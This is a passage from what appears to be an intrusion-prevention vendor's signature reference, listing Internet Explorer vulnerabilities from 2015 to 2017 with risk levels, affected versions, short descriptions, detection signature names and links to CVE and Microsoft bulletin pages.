sgpkg-ips-646-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Internet Explorer which may lead to information disclosure.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1686-Information-Disclosure

References:

CVE-2015-1686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1686

MS15-043
http://technet.microsoft.com/security/bulletin/MS15-043

Microsoft-Internet-Explorer-CVE-2015-1687

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1687

References:

CVE-2015-1687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1687

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1692-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-646-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

An information disclosure vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an incomplete fix for CVE-2014-6323 which allows improper access control to the clipboardData object in memory. By enticing a target user to open and interact with a crafted web page, a remote attacker can exploit this vulnerability to access the data stored in the Windows clipboard.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1692-Information-Disclosure

References:

CVE-2015-1692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1692

OSVDB-121979
http://www.osvdb.org/121979

MS15-043
http://technet.microsoft.com/security/bulletin/MS15-043

Microsoft-Internet-Explorer-CVE-2015-1705-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1705-Memory-Corruption

References:

CVE-2015-1705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1705

OSVDB-121987
http://www.osvdb.org/121987

MS15-043
http://technet.microsoft.com/security/bulletin/MS15-043

Microsoft-Internet-Explorer-CVE-2015-1729-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Insecure Configuration

Description:

A vulnerability exists in Microsoft Internet Explorer which allows scripts to download the contents of documents from different origins.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1729-Information-Disclosure

References:

CVE-2015-1729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1729

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-1730

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1730

References:

CVE-2015-1730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1730

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1733-Use-After-Release

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Insecure Configuration

Description:

A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1733-Use-After-Release

References:

CVE-2015-1733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1733

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-1735

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1735

References:

CVE-2015-1735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1735

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1738-Use-After-Release

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Insecure Configuration

Description:

A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1738-Use-After-Release

References:

CVE-2015-1738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1738

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-1744

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A use after free vulnerability exists in Microsoft Internet Explorer. This vulnerability is due to an issue while handling first-letter element styling when processing HTML and script code. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1744

References:

CVE-2015-1744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1744

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1745-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1745-Memory-Corruption

References:

CVE-2015-1745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1745

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1747-Write-What-Where

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-655-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A write-what-where vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in jscript9.dll while handling the DataView object with an ArrayBuffer under certain conditions. A remote attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1747-Write-What-Where

References:

CVE-2015-1747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1747

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1748

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1748

References:

CVE-2015-1748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1748

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1750

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1750

References:

CVE-2015-1750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1750

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1752

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1752
File-Text_Suspicious-AutoDetect-Command

References:

CVE-2015-1752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1752

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-1766

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1766

References:

CVE-2015-1766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1766

MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056

Microsoft-Internet-Explorer-CVE-2015-2372-VBArray-Use-After-Release

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7

Software:

Internet Explorer 10.0

Type:

Malfunction

Description:

A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2372-VBArray-Use-After-Release

References:

CVE-2015-2372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2372

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-2383-Use-After-Release

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2383-Use-After-Release

References:

CVE-2015-2383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2383

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-2388-Misaligned-Pointer

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7

Software:

Internet Explorer 9.0

Type:

Malfunction

Description:

A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2388-Misaligned-Pointer

References:

CVE-2015-2388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2388

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-2389-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2389-Use-After-Free

References:

CVE-2015-2389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2389

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-2390-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2390-Use-After-Free

References:

CVE-2015-2390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2390

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-2391-Double-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7

Software:

Internet Explorer 9.0

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2391-Double-Free

References:

CVE-2015-2391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2391

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-2401-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-663-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2401-Memory-Corruption

References:

CVE-2015-2401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2401

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-2419-Jscript9-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-663-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in jscript9.dll when handling certain objects in memory. A remote attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2419-Jscript9-Memory-Corruption

References:

CVE-2015-2419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-CVE-2015-2443-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-672-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8.1; Windows 10.0; Windows 2008 R2; Windows 2012 R2

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2443-Memory-Corruption

References:

CVE-2015-2443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2443

MS15-079
http://technet.microsoft.com/security/bulletin/MS15-079

Microsoft-Internet-Explorer-CVE-2015-2444-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-672-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 8; Windows 7; Windows 8.1; Windows 2008; Windows 2008 R2; Windows 2003; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to errors while handling certain objects when processing HTML and script code. A remote attacker could exploit these vulnerabilities by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2444-Use-After-Free

References:

CVE-2015-2444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2444

MS15-079
http://technet.microsoft.com/security/bulletin/MS15-079

Microsoft-Internet-Explorer-CVE-2015-2446-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-673-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. This vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2446-Memory-Corruption

References:

CVE-2015-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2446

MS15-079
http://technet.microsoft.com/security/bulletin/MS15-079

Microsoft-Internet-Explorer-CVE-2015-2487-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-684-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. This can lead to arbitrary code execution in the context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-2487-Memory-Corruption

References:

CVE-2015-2487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2487

MS15-094
http://technet.microsoft.com/security/bulletin/MS15-094

Microsoft-Internet-Explorer-CVE-2015-6042-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-698-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-6042-Memory-Corruption

References:

CVE-2015-6042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6042

MS15-106
http://technet.microsoft.com/security/bulletin/MS15-106

Microsoft-Internet-Explorer-CVE-2015-6065

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Risk:

Low

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote, unauthenticated attacker can use this to execute arbitrary code in the context of the target user.

Situation:

File-Text_Internet-Explorer-CVE-2015-6065

References:

CVE-2015-6065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6065

MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113

Microsoft-Internet-Explorer-CVE-2015-6066

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Risk:

Low

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-Text_Internet-Explorer-CVE-2015-6066

References:

CVE-2015-6066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6066

MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113

Microsoft-Internet-Explorer-CVE-2015-6068

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Risk:

Low

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-Text_Internet-Explorer-CVE-2015-6068

References:

CVE-2015-6068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6068

MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113

Microsoft-Internet-Explorer-CVE-2015-6070

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Risk:

Low

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-Text_Internet-Explorer-CVE-2015-6070

References:

CVE-2015-6070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6070

MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113

Microsoft-Internet-Explorer-CVE-2015-6071-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-6071-Memory-Corruption

References:

CVE-2015-6071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6071

MS15-112
http://technet.microsoft.com/security/bulletin/MS15-112

Microsoft-Internet-Explorer-CVE-2015-6075-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code in the context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-6075-Memory-Corruption

References:

CVE-2015-6075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6075

MS15-112
http://technet.microsoft.com/security/bulletin/MS15-112

Microsoft-Internet-Explorer-CVE-2015-6076

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Risk:

Low

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-Text_Internet-Explorer-CVE-2015-6076

References:

CVE-2015-6076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6076

MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113

Microsoft-Internet-Explorer-CVE-2015-6136-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-713-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-6136-Memory-Corruption

References:

CVE-2015-6136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6136

MS15-126
http://technet.microsoft.com/security/bulletin/MS15-126

Microsoft-Internet-Explorer-CVE-2016-3288-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-797-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker could use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2016-3288-Memory-Corruption

References:

CVE-2016-3288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3288

MS16-095
http://technet.microsoft.com/security/bulletin/MS16-095

Microsoft-Internet-Explorer-CVE-2016-3289

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-785-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2016-3289

References:

CVE-2016-3289
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3289

MS16-096
http://technet.microsoft.com/security/bulletin/MS16-096

Microsoft-Internet-Explorer-CVE-2016-3293

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-785-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2016-3293

References:

CVE-2016-3293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3293

MS16-096
http://technet.microsoft.com/security/bulletin/MS16-096

Microsoft-Internet-Explorer-CVE-2016-3327

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-785-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Situation:

File-Flash_Microsoft-Internet-Explorer-CVE-2016-3327
File-Text_Microsoft-Internet-Explorer-CVE-2016-3327

References:

CVE-2016-3327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3327

MS16-096
http://technet.microsoft.com/security/bulletin/MS16-096

Microsoft-Internet-Explorer-CVE-2017-0008-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-865-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Internet Explorer. A remote attacker can use this to gain access to sensitive information.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2017-0008-Information-Disclosure

References:

CVE-2017-0008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0008

MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006

Microsoft-Internet-Explorer-CVE-2017-0018

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Internet-Explorer-CVE-2017-0018

References:

CVE-2017-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0018

MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006

Microsoft-Internet-Explorer-CVE-2017-0037

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

